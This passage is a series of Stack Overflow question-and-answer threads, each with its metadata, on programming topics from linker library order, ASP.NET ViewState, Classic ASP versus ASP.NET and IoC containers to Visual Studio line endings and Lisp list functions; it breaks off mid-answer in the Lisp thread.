For the most part we use a structured hierarchy of libraries (core, platform, different layers of abstraction), but for some systems you still have to play with the order in the link command.
Once you hit upon a solution document it so the next developer does not have to work it out again.
My old lecturer used to say, "high cohesion & low coupling", it’s still true today.
A: Link order certainly does matter, at least on some platforms. I have seen crashes for applications linked with libraries in wrong order (where wrong means A linked before B but B depends on A).
A: The GNU ld linker is a so-called smart linker. It will keep track of the functions used by preceding static libraries, permanently tossing out those functions that are not used from its lookup tables. The result is that if you link a static library too early, then the functions in that library are no longer available to static libraries later on the link line.
The typical UNIX linker works from left to right, so put all your dependent libraries on the left, and the ones that satisfy those dependencies on the right of the link line. You may find that some libraries depend on others while at the same time other libraries depend on them. This is where it gets complicated. When it comes to circular references, fix your code!
A: Another alternative would be to specify the list of libraries twice:
gcc prog.o libA.a libB.a libA.a libB.a -o prog.x
Doing this, you don't have to bother with the right sequence since the reference will be resolved in the second block.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45135",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "566"
} |
Q: What are you currently using for data access? What particular method/application are you using to communicate between your application and a database? Custom code with stored procedures? SubSonic? nHibernate? Entity Framework? LINQ?
A: I primarily use Microsoft Enterprise Library Data Access Block to access stored procedures in MS SQL Server databases.
A: I've been using NHibernate for the last year or so, and it's proved to be a really quick way of getting basic CRUD (almost) for free.
If this is something you're looking to get into, I can recommend Billy McCafferty's NHibernate best practices article on CodeProject:
http://www.codeproject.com/KB/architecture/NHibernateBestPractices.aspx
This has proven to be a great scalable and flexible solution and makes it easy to achieve a clear separation of the DAL from the other layers.
A: We're using IdeaBlade on our projects. I've found it to be pretty easy to use.
A: I used Hibernate in my previous job to connect to both MySql and Sql Server but I have since switched over to .NET so currently I work with LINQ and I really enjoy it.
A: At work our code base is C++ and Perl and we talk to a MySQL database. For our interface we have some fairly thin custom classes wrapped around the basic MySQL client libraries for our C++ code and the DBI module for our Perl scripts.
A: SubSonic and LINQ to SQL, hopefully one day soon LINQ to SubSonic though!
A: I primarily use NHibernate, both at work and on my freetime projects. This started as an attempt to break out of the norm at work to use ADO.NET datareaders/datasets and we now have a few projects using Hibernate/NHibernate.
A: SqlHelper class from the older version of the MS Enterprise App Blocks. It is far from perfect, but hard to beat its simplicity for simple CRUD apps.
A: MS SQL Stored Procedures.
A: I usually create a DataTier with LiNQ.
It consist of repositories that implement composite interfaces, so I have total flexibility on how to use them.
IPersonRepository : IReadRepository<Person>, ICreateRepository<Person>, IUpdateRepository<Person> //and so on..
They are mostly domain object centric, so they emit domain objects and take care of all the mapping logic themselves.
They might also create some lookup dictionaries, e.g. a dictionary consisting of the id and name of a person, so I don't have to pull up too much from the db to display a drop-down list.
Although sometimes, for smaller projects, I just use Attribute base mapping without a .dbml.
I feel that this approach gives a very clean application model, because all the messy data centric logic is hidden in the DataTier. The Business-/ServiceTier is pure business :)
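For illustration, the composite interfaces mentioned above might be declared like this (a sketch; the member signatures are assumptions):
public interface IReadRepository<T>
{
    T GetById(int id);
}

public interface ICreateRepository<T>
{
    void Create(T entity);
}

public interface IUpdateRepository<T>
{
    void Update(T entity);
}

public interface IPersonRepository :
    IReadRepository<Person>, ICreateRepository<Person>, IUpdateRepository<Person>
{
    // e.g. an id/name dictionary for drop-down lists, as described above
    IDictionary<int, string> GetNameLookup();
}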
A: *
*SQL Server
*All stored procedures
*Handrolled polymorphic entity framework that I reuse from project to project to handle the Sproc Resultset -> Object mapping.
I guess that makes me oldschool.
A: An MVC framework where models have data-source classes that encapsulate the actual database language. The developer in most cases uses save, saveField, delete, find etc. methods, and the framework translates these into SQL queries. This is not only safer and easier, it is also very convenient in that the code is data-source independent, i.e. you can change the database server and keep the code.
A: I started with Hibernate on a Java project at my workplace, and then realized that there is a .NET port (NHibernate) and used it again in a .NET project. I also came across the article that joesteele mentions, and used it as a base for my projects with some minor modifications when needed, mostly when I needed to control transaction beginning and ending manually.
Having the same practice and library available on both the Java and C# platforms, targeting Windows or Linux as application platforms, makes development on different platforms easier than needing to learn different frameworks.
Although I'm planning to examine SubSonic, iBatis and LINQ, for now Hibernate and NHibernate seem like the right tools for the job while I have to target both Windows and Linux platforms.
A: We've got an oracle back end with something like 500 stored procedures where applications run directly against the data.
I started building a custom or-mapped domain model that I've been integrating but I did it wrong initially and now am stuck dealing with that headache as well...ugh
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45152",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: WebDAV query trouble - unable to read body of e-mail Our group (corporate environment) needs to monitor a couple of faceless accounts' Outlook inbox for specific types of bounced e-mails.
WebDAV (using C# 2.0) is one of the paths we've traveled and we're almost there, except for one minor problem: we're getting the response below for the e-mail body element
<a:propstat>
<a:status>HTTP/1.1 404 Resource Not Found</a:status>
<a:prop>
<a:htmldescription />
<a:textdescription />
</a:prop>
</a:propstat>
The only real commonality is that it only happens on messages that our Exchange server is returning to us as "Undeliverable". Note: All other e-mails come across just fine.
Any thoughts?
A: It looks like undeliverable messages in Exchange have a content-type of "multipart/report; report-type=delivery-status". Probably because they don't have a body, just a summary of the delivery attempt which can actually all be gathered from the Headers of the message. Perhaps the WebDAV access (I don't have access to an OWA account right now to check) doesn't know what to do with that, i.e. is just thinks the e-mails don't have a body.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45155",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "0"
} |
Q: How do I convert a list with graphical links to an inline list? Given this HTML:
<ul id="topnav">
<li id="topnav_galleries"><a href="#">Galleries</a></li>
<li id="topnav_information"><a href="#">Information</a></li>
</ul>
And this CSS:
#topnav_galleries a, #topnav_information a {
background-repeat: no-repeat;
text-indent: -9000px;
padding: 0;
margin: 0 0;
overflow: hidden;
height: 46px;
width: 136px;
display: block;
}
#topnav { list-style-type: none; }
#topnav_galleries a { background-image: url('image1.jpg'); }
#topnav_information a { background-image: url('image2.jpg'); }
How would I go about turning the topnav list into an inline list?
A: Try this:
#topnav {
overflow:hidden;
}
#topnav li {
float:left;
}
And for IE you will need to add the following:
#topnav {
zoom:1;
}
Otherwise your floated <li> tags will spill out of the containing <ul>.
A: An alternative to floating the elements left is this:
#topnav li {
display: inline;
}
A: Another approach would be to use display: inline-block for the li elements:
#topnav li {
display: inline-block;
}
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45163",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: Stream data (such as music) using PHP (or another language) For years, I've been investigating how to create music streams from my computer. I've seen programs, but anything useful I've seen is Windows only (I use a Mac).
Eventually, I got interested in how streams work. Is there any way I could create my own stream, possibly using socket functions in PHP? Is there a PHP library for this?
A: Take a look at Ampache. It is a Web-based Open Source Audio file manager. It is implemented with MySQL, and PHP. It allows you to view, edit, and play your audio files via the web.
A: In the end it all boils down to the protocol you'd want to use. Shoutcast IMHO is plain HTTP, so to make your own stream, you just output the streams content.
To make an ogg based webradio work with my Sonos system, I have created a little transcoding wrapper around sox which is is actually written in PHP, so it may be helpful to you to serve as an example.
You'll find it here: http://www.gnegg.ch/ogg2mp3/
If you are after implementing your very own streaming protocol - maybe even UDP based, then, I'm afraid, PHP may not be the right solution for the problem - at least not as long as it has its share of problems when used for long running processes (which 5.3 may bring some help for with its integrated garbage collection)
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45166",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "5"
} |
Q: How do I return an array of strings from an ActiveX object to JScript I need to call into a Win32 API to get a series of strings, and I would like to return an array of those strings to JavaScript. This is for script that runs on local machine for administration scripts, not for the web browser.
My IDL file for the COM object has the interface that I am calling into as:
HRESULT GetArrayOfStrings([out, retval] SAFEARRAY(BSTR) * rgBstrStringArray);
The function returns correctly, but the strings are getting 'lost' when they are being assigned to a variable in JavaScript.
The question is:
What is the proper way to get the array of strings returned to a JavaScript variable?
A: If i recall correctly, you'll need to wrap the SAFEARRAY in a VARIANT in order for it to get through, and then use a VBArray object to unpack it on the JS side of things:
HRESULT GetArrayOfStrings(/*[out, retval]*/ VARIANT* pvarBstrStringArray)
{
// ...
_variant_t ret;
ret.vt = VT_ARRAY|VT_VARIANT;
ret.parray = rgBstrStringArray;
*pvarBstrStringArray = ret.Detach();
return S_OK;
}
then
var jsFriendlyStrings = new VBArray( axOb.GetArrayOfStrings() ).toArray();
A: Shog9 is correct. COM scripting requires that all outputs be VARIANTS.
In fact, it also requires that all the INPUTs be VARIANTS as well -- see the nasty details of IDispatch in your favorite help file. It's only through the magic of the Dual Interface implementation by ATL and similar layers (which most likely is what you are using) that you don't have to worry about that. The input VARIANTs passed by the calling code are converted to match your method signature before your actual method is called.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45169",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "5"
} |
Q: What do you do when you can't use ViewState? I have a rather complex page that dynamically builds user controls inside of a repeater. This repeater must be bound during the Init page event before ViewState is initialized or the dynamically created user controls will not retain their state.
This creates an interesting Catch-22 because the object I bind the repeater to needs to be created on initial page load, and then persisted in memory until the user opts to leave or save.
Because I cannot use ViewState to store this object, yet have it available during Init, I have been forced to store it in Session.
This also has issues, because I have to explicitly null the session value during non postbacks in order to emulate how ViewState works.
There has to be a better approach to state management in this scenario. Any ideas?
Edit: Some good suggestions about using LoadViewState, but I'm still having issues with state not being restored when I do that.
Here is somewhat if the page structure
Page --> UserControl --> Repeater --> N amount of UserControls Dynamically Created.
I put the overridden LoadViewState in the parent UserControl, as it is designed to be completely encapsulated and independent of the page it is on. I am wondering if that is where the problem is.
A: The LoadViewState method on the page is definitely the answer. Here's the general idea:
protected override void LoadViewState( object savedState ) {
var savedStateArray = (object[])savedState;
// Get repeaterData from view state before the normal view state restoration occurs.
repeaterData = savedStateArray[ 0 ];
// Bind your repeater control to repeaterData here.
// Instruct ASP.NET to perform the normal restoration of view state.
// This will restore state to your dynamically created controls.
base.LoadViewState( savedStateArray[ 1 ] );
}
SaveViewState needs to create the savedState array that we are using above:
protected override object SaveViewState() {
var stateToSave = new List<object> { repeaterData, base.SaveViewState() };
return stateToSave.ToArray();
}
Don't forget to also bind the repeater in Init or Load using code like this:
if( !IsPostBack ) {
// Bind your repeater here.
}
A:
This also has issues, because I have to explicitly null the session value during non postbacks in order to emulate how ViewState works.
Why do you have to explicitly null out the value (aside from memory management, etc)? Is it not an option to check Page.IsPostback, and either do something with the Session variable or not?
A: I have always recreated my dynamic controls in the LoadViewState event. You can store the number of controls needed to be created in the viewstate and then dynamically create that many of them using the LoadControl method inside the LoadViewState event. In this event you have access to the ViewState but it has not been restored to the controls on the page yet.
A: 1) there's probably a way to get it to work... you just have to make sure to add your controls to the tree at the right moment. Too soon and you don't get ViewState. Too late and you don't get ViewState.
2) If you can't figure it out, maybe you can turn off viewstate for the whole page and then rely only on querystring for state changes? Any link that was previously a postback would be a link to another URL (or a postback-redirect).
This can really reduce the weight of the page and make it easier to avoid issues with ViewState.
A: protected override void LoadViewState(object savedState)
{
// Put your code here before base is called
base.LoadViewState(savedState);
}
Is that what you meant? Or did you mean in what order are the controls processed? I think the answer to that is it's quasi-random.
Also, why can't you load the objects you bind to before Page_Load? It's ok to call your business layer at any time during the page lifecycle if you have to, with the exception of pre-render and anything after.
A:
I have to explicitly null the session
value during non postbacks in order to
emulate how ViewState works.
I'm still foggy as to why you can't store whatever object(s) you are binding against in session. If you could store that object in session the following should work:
*
*On first load bind your top user control to the object during OnPreInit. Store the object in session. Viewstate will automatically be stored for those controls. If you have to bind the control the first time on Page_Load that is ok, but you'll end up having two events that call bind if you follow the next step.
*On postback, rebind your top user control in the OnPreInit method against the object you stored in session. All of your controls should be recreated before the viewstate loads. Then when viewstate is restored, the values will be set to whatever is in viewstate. The only caveat here is that when you bind again on the postback, you have to make 100% sure that the same number of controls are created again. The key to using Repeaters, Gridviews etc... with dynamic controls inside of them is that they have to be rebound on every postback before the viewstate is loaded. OnPreInit is typically the best place to do this. There is no technical constraint in the framework that dictates that you must do all your work in Page_Load on the first load.
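A rough sketch of those two steps in code (MyData, BuildRepeaterData and the session key are hypothetical placeholders; note that with master pages the content controls aren't reachable yet in OnPreInit, so you may need to defer to OnInit):
protected override void OnPreInit(EventArgs e)
{
    base.OnPreInit(e);

    // First load: build the object and park it in session.
    // Postback: pull the same object back out so the identical
    // control tree is recreated before view state is restored.
    var data = (List<MyData>)Session["repeaterData"];
    if (data == null)
    {
        data = BuildRepeaterData(); // hypothetical factory method
        Session["repeaterData"] = data;
    }

    myRepeater.DataSource = data;
    myRepeater.DataBind();
}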
This should work. However, if you can't use session for some reason, then you'll have to take a slightly different approach such as storing whatever you are binding against in the database after you bind your control, then pulling it out of the database and rebinding again on every postback.
Am I missing some obvious detail about your situation? I know it can be very tricky to explain the subtleties of the situation without posting code.
EDIT: I changed all references to OnInit to OnPreInit in this solution. I forgot that MS introduced this new event in ASP.NET 2.0. According to their page lifecycle documentation, OnPreInit is where dynamic controls should be created/recreated.
A: When creating dynamic controls ... I only populate them on the initial load. Afterwards I recreate the controls on postback in the page load event, and the viewstate seems to handle the repopulating of the values with no problems.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45176",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: Are there benefits to Classic ASP over ASP.net Having worked with Classic ASP for about 2 years now by creating a few 100 simple web forms I can't see a good reason for switching to .net; however, I'm not that versed in .net so I'm sure I could be missing a few things.
Some points that I often hear around work can be found here: http://www.packtpub.com/article/Classic-ASP (not that I share all of these thoughts, but it's a good jumping off point)
I'm very interested to hear what others have to say on this matter.
A: If you look back at your old code and say, "What was I thinking! This is rubbish, I write code much better now!" then you have developed as a programmer.
If the sites are fairly temporary (i.e. you build it quickly, it gets used for a specific purpose and amount of time and then it is effectively closed) then banging out these sites in the most comfortable way for you is perfectly acceptable.
If you have a long list of bugs, fixes and improvements that you now need (or would like) to backport to your old sites, or your "small sites" are getting bigger and more complicated and this is causing you significant grief, then you need to take a step back and re-evaluate how you structure and support these sites.
I would very much agree that ASP.NET is a very much more mature and effective programming environment. However, like any tool, you need to know (or learn) the right way to use it as it's not going to automatically turn you into a "super programmer" overnight.
A way to break the ice is to agree with your boss that the next "site" you create is developed in ASP.NET. Explain to him that it will take quite a lot longer than how you currently deliver sites because you have to "get your head around" ASP.NET, but the benefits are x,y and (exercise left to the reader!)
Personally, I'm still in the transition phase (and I started using ASP.NET from v1!) as I have a fairly robust Classic ASP framework I've developed and am comfortable with. However, I have used ASP.NET strategically and have found it VERY powerful, and you do end up writing much less code, as so much is built into the .net framework, as long as you can find it in documentation.
I also recommend that you DON'T use VB.NET and you bite the bullet to use C#. The change of language is quite minor, but you reduce the chances of writing your sites exactly the same way as you used to. It helps break the bad habits and gives you a chance to learn new techniques.
Good Luck!
A: You're missing more than a few things! ASP.NET is orders of magnitude more productive, robust, and maintainable than old-school ASP ever thought about being. Server side controls, third-party controls, master pages, forms authentication, forms validation, an OO model that encourages appropriate application partitioning, easy deployment, built-in debugging and tracing, state management.
You even have the choice of WebForms or MVC. It's not an understatement to say that you are simply out of your mind if you don't thoroughly investigate what you're missing.
A: For simple sites, I actually prefer ASP vs. ASP.NET, especially if you know HTML well. However with ASP, separating business logic from view is hard; the code you write will likely be challenging to read + maintain.
PHP is better than ASP though - and somewhat similar at the basic level. And you could always go to Rails or Django, if you're interested in self-contained web development stack (but a lot longer learning curve).
A: I have one word: "debugging" - you never want to have to use it but you always do. In .Net, if you're using Visual Studio, you have a fantastic debugger when compared to trying to debug code in ASP.
A: Rarely does a response in this thread answer the question. Instead of taking the easy way out, I'll take a stab at it:
A few benefits that have not been mentioned (JScript-centric):
*
*You can learn the entire language and keep it in your memory if you use it enough - I don't know anyone who claims to know the entire .NET framework; this makes coding very rapid.
*Weak typing - this can let you code more rapidly when banging something out quickly, e.g., do you really care about the difference between char and string most of the time? (insert religious flame-war here)
*Eval: this much-maligned keyword is actually incredibly powerful, and lets you manipulate your code at runtime in really interesting ways
*Client/server language compatibility: JScript's similarity to Javascript means that you can use the same include file for server-side validation as you use for client-side.
A: If you like ASP, and want to move to ASP.NET, skip Webforms and learn MVC.
A: One advantage to ASP.NET is that you have the option of coding your site exactly as you did with classic ASP, along with access to the richness of the .NET framework. You can keep existing functionality and add new ASP.NET functionality were needed. They mix well.
Unfortunately the author of the referenced article isn't very well versed in the technology behind ASP.NET, as evidenced by his remarks (and maybe not even classic ASP). Most of his points are invalid or simply wrong.
A: Everyone here has made valid points.
I was a classic ASP developer until 3 yrs ago when I switched to .NET 2.0.
I couldn't go back (even though I do still have to fix a handful of classic ASP sites).
I do miss having a recordset object. Data repeaters are great for displaying data quickly, but datasets, whilst offering wonderful functionality, are damn awful when it comes to performance on 'big' sites. In fairness I've been doing datasets in a roundabout way with Arrays in classic ASP. The only time I use datasets is for my e-commerce site baskets. I do miss rs.movenext, etc...
FlySwat has made one of the biggest mistakes that I see a lot of developers make.
Yes business logic, OO etc... that .NET brings is great (scalability I wouldn't 100% agree with, but definitely more extensible), but when using ASP.NET you are still creating a WEB SITE. Forget this nonsense of using the terminology 'application'. I have met many great .NET developers who build n-tier, OO sites, but they have no real understanding of the uniqueness of building a web site, such as state, or the bloody annoying problem that they over-rely on Javascript. Most of these developers build MS type sites which don't normally meet W3C, aren't cross browser friendly and never gracefully degrade. And no it is not acceptable even for back office applications to be only compatible with IE.
.NET also tends to 'fatten' simple sites. .NET in many ways was a way of getting WinForm developers to start building web sites (or as they prefer, web apps.). The problem was that this brought with it a bunch of developers who had the luxuries not having to worry about state, standards, etc...
I still maintain that any .NET site can be built in classic ASP and run faster (page response times) for the end user....
...BUT though I have fond memories of classic ASP, what I can do with .NET in terms of imaging, encryption, compression, easy web service integration, proper OO, decent n-tier, extensibility, etc...is what gives .NET the advantage. Even silly things like simply adding one line of code to the web.config to tell it to write the sessionID to the querystring if the user doesn’t accept cookies (this was a pain in classic ASP) is great.
Move to .NET, you won’t regret it, but do give yourself sometime (particularly if you don’t know about OO (inheritance, abstraction, polymorphism and encapsulation). Don’t start building .NET sites in classic compatibility mode, it’s just a cheap way of doing .NET and you’ll still end up using classic ASP practises. If VBScript was your main development language, the jump is no were near as easy as MS or others would have you believe.
Most importantly for me is that I have carried across, from my classic ASP days, fundamental web site application (;-)) design and this should never change between languages.
A: If all you make is simple little web pages, then do whatever. Or better yet learn PHP. Most of the response you are going to get are from people who make web applications, and for that asp.net blows the pants off of classic asp in power and maintainability though.
A: The biggest issue for me is that I create applications, not websites...The UI is a minor part of the problem, the big part is writing the business logic layer, and various enterprise communication components (Connecting to SAP using SOAP? No Problem!).
The .NET Toolkit allows me to program in a wonderful object oriented language (C#) and has a robust framework to help out.
VbScript is a godawful language to try and write a business application in.
However, if all you do is a simple little webform, then sure, use VbScript.
As far as your link, it basically boils down:
*
*WaaWaa, I don't like Visual Studio
*WaaWaa, I want to edit production code on the production server like an idiot.
*WaaWaa, I don't know that deploying a single compiled DLL is all that a small site needs to deploy an asp.net app.
Basically, it's ignorance in a nutshell.
A: To focus on the specific question ("benefits of Classic vs .Net"), there are only two things I can think of Classic does that .Net won't:
1) Includes. They just don't work like you expect in ASP.Net. Of course, ASP.Net provides much better ways of accomplishing the same thing, but it's still a bit of a loss and can make migrating an old site to .Net a pain.
2) ASP.Net won't go above the root folder for the application. Where I'm at we have a rather complex intranet that's still mostly classic ASP, with a smattering of .Net apps here and there as things are updated or new stuff added. It would be nice to be able to keep one copy of common code up fairly high in the folder hierarchy but still have each individual app isolated to its own VD. But then, that's what source control is for, so it's not a big deal.
For me, the biggest advantage moving from Classic ASP and ASP.Net so far is the IDE. It's so nice to be able to right click on a function call and choose "Go to Definition" rather than having to dig around to find the file where the function is actually implemented. Huge time-saver. And intellisense support and type safety when calling functions is a boon as well.
A: I agree with everyone here except the one who said skip webforms and go straight to MVC. This is not helpful. Webforms is very useful for database-driven applications which do lots of table displays, etc. I have worked on some very large webforms applications and it works fine. MVC is good for more interactive "Web 2.0" type applications.
A: I always use Classic ASP, it works beautifully.
I tried ASP.net for a couple of years but it was too complex for most website development. My customers didn't like it either because they couldn't understand it. They also like knowing they are not locked into one developer.
ASP.NET keeps changing and requires an enormous, constant learning curve to keep current. MS switched the primary language to C#, which made the transition just that much harder.
My productivity slowed to a crawl with .net because I was forever out looking for tutorials or examples of how to do everything.
Visual Studio is pig sloooooow.
PHP has an ugly syntax and too many different frameworks which makes it impossible to learn for developer purposes. Good only for intranet use with dedicated staff, in my opinion.
Classic ASP is locked down and works perfectly today just as it did years ago. With a few library files, code writing is easy as pie and examples are unlimited on the internet.
Written correctly, which most folks don't do, VBScript is clean, readable, efficient code. I leave the client side stuff for libraries like jQuery and find I am many times more productive.
A: Performance, scalability, and a framework that provides a much better foundation for the stateless world of web applications, for a start.
Wikipedia's ASP.Net page has a section on the differences.
A: For me I'd have to say Classic ASP is quick to develop in, simple to use/pick up, not overly complicated and very capable of most things asked of it.
ASP with JScript/Javascript as the main language is really, really good fun to code with. VBScript is a waste of brain power and I think it's that which gives Classic ASP its bad name. Plus it's considered slow, but all the articles about speed and number of users are based on 10+ year old servers. We run a site getting 60,000 users a day on two servers and the CPU barely flickers. Modern servers give you a lot more power to play with.
With the huge leaps forward in Javascript usage, designs and best practises in recent years the ASP JScript coder can get a lot of goodies to make life even easier. I've ported Mootools to server-side and with that we get a load of wonderful helpers, a class model, an excellent event model and so much more. ASP is great fun. UPDATE: Mootools now have a server-side build that you can download (http://mootools.net/download).
ASP.net is SUPER powerful but has a big ramp on the learning curve to do well, can bring your whole site down when it has one of its fits and, worst for me, can seem to really go around the houses to get the simplest of things done.
I'm having a lot of fun using both at the minute, using whichever one best fits the gap. I've a great little CMS Cacher and Thumbnailer built in .net which my ASP scripts use. Best of both worlds.
A: Having done a "rename asp to aspx and change until it compiles" port of an application to asp.net I would say that even asp classic style programming in .NET is better than asp classic. VS of course will encourage you to fall into the pit of success and drive you towards the web forms and code-behind way of doing things, but the language is expressive enough to replicate the patterns of asp classic (namely lots of golden nuggets/inline code, cross posting pages, etc)
I think I've heard it said before that you can write COBOL in any language. That's true for classic asp.
A: 5 Reasons You Should Take a Closer Look at ASP.NET MVC
A: If you use classic asp at this point (without a mandate from your CTO) then you need to see a shrink, or you are a masochist. Or a satanist, in which case you'd like it cuz you'd be in hell! :p
On a serious note... for web applications use WebForms.
For light, quick and dirty websites, use ASP.NET MVC.
The good thing about ASP.NET is that you can use VB.NET, C#, Eiffel, Boo or PHP for your language! For PHP check out Phalanger...
A: Since I'm paid to create solutions and not to write code, I just prefer ASP.NET over classic ASP. While classic ASP is still practical for very small, simple sites, there's still a lot of power behind ASP.NET when writing a bit more complex sites. Besides, even with ASP.NET you could still just use Notepad to write the .aspx files yourself, including embedded vb or c# code. Visual Studio just provides a lot of additional functionality that takes away the need to write more code yourself.
And, as I said, I don't get paid for writing code...
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45179",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "53"
} |
Q: Problems with disabling IIS shutdown of idle worker process? I ran into an issue with an IIS web app shutting down an idle worker process! The next request would then have to re-initialize the application, leading to delays.
I disabled the IIS shutdown of idle worker processes on the application pool to resolve this. Are there any issues associated with turning this off? If the process is leaking memory, I imagine it is nice to recycle the process every now and then.
Are there any other benefits to having this process shutdown?
A: I'm assuming that you're referring to IIS 6.
Instead of disabling shutdown altogether, maybe you can just increase the amount of time it waits before killing the process. The server is essentially conserving resources - if your server can stand the resource allocation for a process that mostly sits around doing nothing, then there isn't any harm in letting it be.
As you mentioned, setting the auto-recycling of the process on a memory limit would be a good idea, if the possibility of a memory leak is there.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45180",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "5"
} |
Q: IoC Container Configuration/Registration I absolutely need to use an IoC container for decoupling dependencies in an ever increasingly complex system of enterprise services. The issue I am facing is one related to configuration (a.k.a. registration). We currently have 4 different environments -- development to production and in between. These environments have numerous configurations that slightly vary from environment to environment; however, in all cases that I can currently think of, dependencies between components do not differ from environment to environment, though I could have missed something and/or this could obviously change.
So, the ultimate question is, does anybody have a similar experience using an IoC framework? Or, can anybody recommend one framework over another that would provide flexible registration be it through some sort of convention or simplified configuration information? Would I still be able to benefit from a fluent interface or am I stuck with XML -- I'd like to avoid XML-hell.
Edit: This is a .Net environment and I have been looking at Windsor, Ninject and Autofac. They all seem to now support both methods of registration (fluent and XML), though Autofac's support for lambda expressions seems to be a little different than the others. Anybody use that in a similar multi-deployment environment?
A: If you want to abstract your container, and be able to use different ones, look into making it injectable, the way I tried to do it here
A: I use Ninject. I like the fact that I don't have to use Xml to configure the dependencies. I can just use straight up C# code. There are multiple ways of doing it also. I know other libraries have that feature, but Ninject offers fast instantiation, it is pretty lightweight, it has conditional binding, supports compact framework, and it supports Silverlight, 2.0. I also use a wrapper on top of it, in case I do switch it out for another framework in the future. You should definitely try Ninject when deciding on a framework.
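For example, a binding in Ninject's 1.x API looks roughly like this (treat it as a sketch: the interface and class names are hypothetical, and the module base class was renamed in later Ninject versions):
public class ServiceModule : StandardModule
{
    public override void Load()
    {
        // Map abstractions to concrete types in plain C#, no XML.
        Bind<IRepository>().To<SqlRepository>();
        Bind<ILogger>().To<FileLogger>();
    }
}

// At application startup:
var kernel = new StandardKernel(new ServiceModule());
var repo = kernel.Get<IRepository>();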
A: I'm not sure whether it will suit your particular case, as you didn't mention what platform you're working in, but I've had great success with Castle Windsor's IoC framework. The dependencies are set up in the config file (it's a .NET framework)
A: Look at Ayende's Rhino Commons. He uses an abstraction over the IoC container, so that you can switch containers whenever you want. Something like container.Resolve is always there in every container.
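A minimal sketch of that kind of wrapper (all the names here are arbitrary):
// Thin gateway so application code never references the concrete
// container; swapping containers means swapping the adapter.
public interface IDependencyResolver
{
    T Resolve<T>();
}

public static class IoC
{
    private static IDependencyResolver resolver;

    public static void Initialize(IDependencyResolver adapter)
    {
        resolver = adapter;
    }

    public static T Resolve<T>()
    {
        return resolver.Resolve<T>();
    }
}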
I use StructureMap to do the dirty work; it has a fluent interface and the XML support, and it is powerful enough for most things you want to do. Each one has its own pros and cons, so a little abstraction so you can easily switch (you never know how long they are going to be around) is good.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45202",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: How do I force unix (LF) line endings in Visual Studio (Express) 2008? Is there a way to always have LF line endings in Visual Studio? I can never seem to find it!
A: There's an add-in for Visual Studio 2008 that converts the end of line format when a file is saved. You can download it here: http://grebulon.com/software/stripem.php
A: You don't have to install any plugins.
As mentioned here you can configure line endings in File -> Advanced Save options...
A: Yes, there is a way to always have LF line endings, at least in Visual Studio 2010 Pro.
Go to Tools | Options... | Environment | Documents
Then Enable the Check for consistent line endings on load option.
It works for me.
A: Visual Studio 2008 doesn't retain the advanced save options after the solution is closed. I would be willing to hand edit a lot of files if that would make it work consistently, but I am not willing to change all of the settings every time I open VS.
This is too bad. Since VS does support forcing the line-endings to whatever is desired in the backend, it's just not hooked up properly in the UI. Maybe Microsoft will fix this in a service pack.
A: There's a plugin to VS called Strip'Em where you can choose which kind of new line type you want to auto convert all the line endings to when saving.
(You can choose between LF, CRLF, CR.)
A: I seem to have found a method by accident and found this article attempting to correct it (I want Windows CRLF EOL)! Doing the following results in UNIX (LF only) line endings for me.
SaveFileDialog^ dialog = gcnew SaveFileDialog();
System::Windows::Forms::DialogResult DR;
dialog->Filter = "txt files (*.txt)|*.txt|All files (*.*)|*.*";
dialog->FilterIndex = 2;
dialog->RestoreDirectory = true;
dialog->DefaultExt = "txt";
DR = dialog->ShowDialog(this);
if ( DR == System::Windows::Forms::DialogResult::OK )
{
// Get the page (tab) we are currently on
System::Windows::Forms::TabPage ^selPage = this->tabControl1->SelectedTab;
// Note: technically the correct way to look for our control is to use Find and search by name
// System::Windows::Forms::RichTextBox ^selText = selPage->Controls->Find("rtb", false);
// I only add one control (rich text) so first control ([0]) must be it
System::Windows::Forms::RichTextBox ^selText = safe_cast<System::Windows::Forms::RichTextBox^>(selPage->Controls[0]);
// Just let a Windows forms method do all the work
File::WriteAllText(dialog->FileName, selText->Text);
}
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45207",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "67"
} |
Q: List operations in Lisp I have been searching everywhere for the following functionality in Lisp, and have gotten nowhere:
*
*find the index of something in a list. example:
(index-of item InThisList)
*replace something at a specific spot in a list. example:
(replace item InThisList AtThisIndex) ;i think this can be done with 'setf'?
*return an item at a specific index. example:
(return InThisList ItemAtThisIndex)
Up until this point, I've been faking it with my own functions. I'm wondering if I'm just creating more work for myself.
This is how I've been faking number 1:
(defun my-index (findMe mylist)
  (let ((counter 0) (found 1))
    (dolist (item mylist)
      (cond
        ((eq item findMe) ;this works because 'eq' checks place in memory,
                          ;and as long as 'findMe' was from the original list, this will work.
         (setq found nil))
        (found (incf counter))))
    counter))
A: Answers:
*
*(position item sequence &key from-end (start 0) end key test test-not)
http://lispdoc.com/?q=position&search=Basic+search
*(setf (elt sequence index) value)
*(elt sequence index)
http://lispdoc.com/?q=elt&search=Basic+search
NOTE: elt is preferable to nth because elt works on any sequence, not just lists
A: Jeremy's answers should work; but that said, if you find yourself writing code like
(setf (nth i my-list) new-elt)
you're probably using the wrong datastructure. Lists are simply linked lists, so they're O(N) to access by index. You might be better off using arrays.
Or maybe you're using lists as tuples. In that case, they should be fine. But you probably want to name accessors so someone reading your code doesn't have to remember what "nth 4" is supposed to mean. Something like
